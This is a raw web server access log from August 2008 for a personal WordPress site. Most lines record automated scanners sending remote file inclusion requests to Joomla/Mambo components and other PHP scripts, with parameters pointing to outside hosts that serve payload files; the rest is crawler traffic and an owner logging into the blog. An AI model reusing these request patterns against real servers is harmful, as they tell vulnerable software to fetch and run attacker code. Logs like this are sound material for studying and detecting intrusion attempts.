69.72.218.250 - - [18/Aug/2008:13:06:04 -0700] "GET /logs/access_080808.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
69.72.218.250 - - [18/Aug/2008:13:06:04 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lnx.huddle.org/tb1tl33.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
62.2.246.201 - - [18/Aug/2008:13:06:30 -0700] "GET /phphtml.php?htmlclass_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:06:33 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.188.110.30 - - [18/Aug/2008:13:06:36 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.246.201 - - [18/Aug/2008:13:06:36 -0700] "GET /logs/phphtml.php?htmlclass_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.246.201 - - [18/Aug/2008:13:06:45 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.21.231 - - [18/Aug/2008:13:06:46 -0700] "GET /logs//index2.php?DOCUMENT_ROOT=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [18/Aug/2008:13:06:46 -0700] "GET //index2.php?DOCUMENT_ROOT=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [18/Aug/2008:13:06:47 -0700] "GET /logs/access_080725.log//index2.php?DOCUMENT_ROOT=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [18/Aug/2008:13:06:48 -0700] "GET /logs/access_080724.log//index2.php?DOCUMENT_ROOT=http://desamauro.altervista.org/libero/gite.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:07:02 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.121.14.8 - - [18/Aug/2008:13:07:13 -0700] "GET /logs/access_071220.log/xkurl.php?PEARPATH=http://videoblog.kilu.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [18/Aug/2008:13:07:13 -0700] "GET /xkurl.php?PEARPATH=http://videoblog.kilu.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.14.8 - - [18/Aug/2008:13:07:13 -0700] "GET /logs/xkurl.php?PEARPATH=http://videoblog.kilu.de/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:13:07:18 -0700] "GET /bikes/dteel/2008_02_16/?M=A HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.2.246.201 - - [18/Aug/2008:13:07:20 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:07:42 -0700] "GET /logs/access_080321.log//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:07:44 -0700] "GET //?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10993 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:07:45 -0700] "GET /logs//?option=com_custompages&cpage=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:07:58 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:07:59 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 11043 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:08:00 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.812" "www.dmulk.com"
213.246.46.202 - - [18/Aug/2008:13:08:08 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://www.lovasok.hu/admin/templates_c/idpula.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:08:13 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:08:14 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 11043 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:08:15 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:08:39 -0700] "GET /logs/access_080615.log//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:13:08:40 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://albforum.freehostia.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:13:08:40 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://albforum.freehostia.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:08:42 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10980 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:08:42 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:08:43 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:08:43 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 11043 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:08:43 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.812" "www.dmulk.com"
201.80.26.155 - - [18/Aug/2008:13:08:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://adamari.net/img/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:09:15 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:09:16 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 11043 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:09:16 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:09:18 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:09:19 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 11043 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:09:19 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.246.201 - - [18/Aug/2008:13:09:25 -0700] "GET /logs/access_080808.log/phphtml.php?htmlclass_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:09:35 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:09:35 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 11043 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:09:36 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.246.201 - - [18/Aug/2008:13:09:38 -0700] "GET /logs/access_080809.log/phphtml.php?htmlclass_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.30.4 - - [18/Aug/2008:13:09:40 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:09:44 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:09:45 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 11043 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [18/Aug/2008:13:09:45 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.155.242 - - [18/Aug/2008:13:09:48 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.73.155.242 - - [18/Aug/2008:13:09:52 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 11043 "-" "libwww-perl/5.812" "www.dmulk.com"
62.2.246.201 - - [18/Aug/2008:13:10:27 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:10:39 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:10:40 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 11043 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:10:40 -0700] "GET /logs/access_080717.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:40 -0700] "GET / HTTP/1.1" 200 10821 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:41 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:41 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:41 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:41 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:10:41 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.65" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:41 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:41 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:41 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:41 -0700] "GET /blog/wp-includes/images/smilies/icon_smile.gif HTTP/1.1" 200 174 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:42 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:42 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:42 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:42 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:42 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:42 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:10:42 -0700] "GET /?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 11043 "-" "libwww-perl/5.65" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:43 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=5&334 HTTP/1.1" 200 3451 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.15.58.12 - - [18/Aug/2008:13:10:43 -0700] "GET /logs/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61141 "-" "libwww-perl/5.65" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:43 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1020.jpg HTTP/1.1" 200 309098 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:44 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&509 HTTP/1.1" 200 185990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-010_1.jpg HTTP/1.1" 200 548534 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.52.66.242 - - [18/Aug/2008:13:10:49 -0700] "GET /logs/access_080624.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:50 -0700] "GET /blog/wp-login.php HTTP/1.1" 200 1860 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:50 -0700] "GET /blog/wp-admin/css/login.css?version=2.5.1 HTTP/1.1" 200 1436 "http://dmulk.com/blog/wp-login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:50 -0700] "GET /blog/wp-admin/css/colors-fresh.css?version=2.5.1 HTTP/1.1" 200 13212 "http://dmulk.com/blog/wp-login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:50 -0700] "GET /blog/wp-admin/images/logo-login.gif HTTP/1.1" 200 3184 "http://dmulk.com/blog/wp-admin/css/login.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:50 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.55.109.34 - - [18/Aug/2008:13:10:53 -0700] "GET /logs/access_080624.log/?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:58 -0700] "POST /blog/wp-login.php HTTP/1.1" 302 17 "http://dmulk.com/blog/wp-login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:59 -0700] "GET /blog/wp-admin/ HTTP/1.1" 200 13020 "http://dmulk.com/blog/wp-login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:59 -0700] "GET /blog/wp-admin/css/global.css?version=2.5.1 HTTP/1.1" 200 2974 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:59 -0700] "GET /blog/wp-admin/wp-admin.css?version=2.5.1 HTTP/1.1" 200 22939 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:59 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.css?1 HTTP/1.1" 200 3632 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:59 -0700] "GET /blog/wp-admin/js/common.js?ver=20080318 HTTP/1.1" 200 1286 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:59 -0700] "GET /blog/wp-includes/js/jquery/jquery.color.js?ver=2.0-4561 HTTP/1.1" 200 4462 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:59 -0700] "GET /blog/wp-admin/css/dashboard.css?version=2.5.1 HTTP/1.1" 200 4793 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:59 -0700] "GET /blog/wp-admin/images/logo-ghost.png HTTP/1.1" 200 880 "http://dmulk.com/blog/wp-admin/css/colors-fresh.css?version=2.5.1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:10:59 -0700] "GET /blog/wp-includes/images/rss.png HTTP/1.1" 200 3341 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:00 -0700] "GET /blog/wp-admin/index-extra.php?jax=incominglinks HTTP/1.1" 200 270 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:00 -0700] "GET /blog/wp-admin/index-extra.php?jax=devnews HTTP/1.1" 200 1107 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:02 -0700] "GET /blog/wp-admin/index-extra.php?jax=plugins HTTP/1.1" 200 1118 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:02 -0700] "GET /blog/wp-admin/index-extra.php?jax=planetnews HTTP/1.1" 200 3368 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:03 -0700] "GET /blog/wp-admin/post-new.php HTTP/1.1" 200 26231 "http://dmulk.com/blog/wp-admin/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:04 -0700] "GET /blog/wp-includes/js/jquery/jquery.schedule.js?ver=20 HTTP/1.1" 200 3457 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:04 -0700] "GET /blog/wp-includes/js/wp-ajax-response.js?ver=20080316 HTTP/1.1" 200 2921 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:04 -0700] "GET /blog/wp-includes/js/autosave.js?ver=20080424 HTTP/1.1" 200 7433 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:04 -0700] "GET /blog/wp-includes/js/jquery/jquery.dimensions.min.js?ver=1.1.2 HTTP/1.1" 200 2514 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:04 -0700] "GET /blog/wp-includes/js/jquery/suggest.js?ver=1.1 HTTP/1.1" 200 6459 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
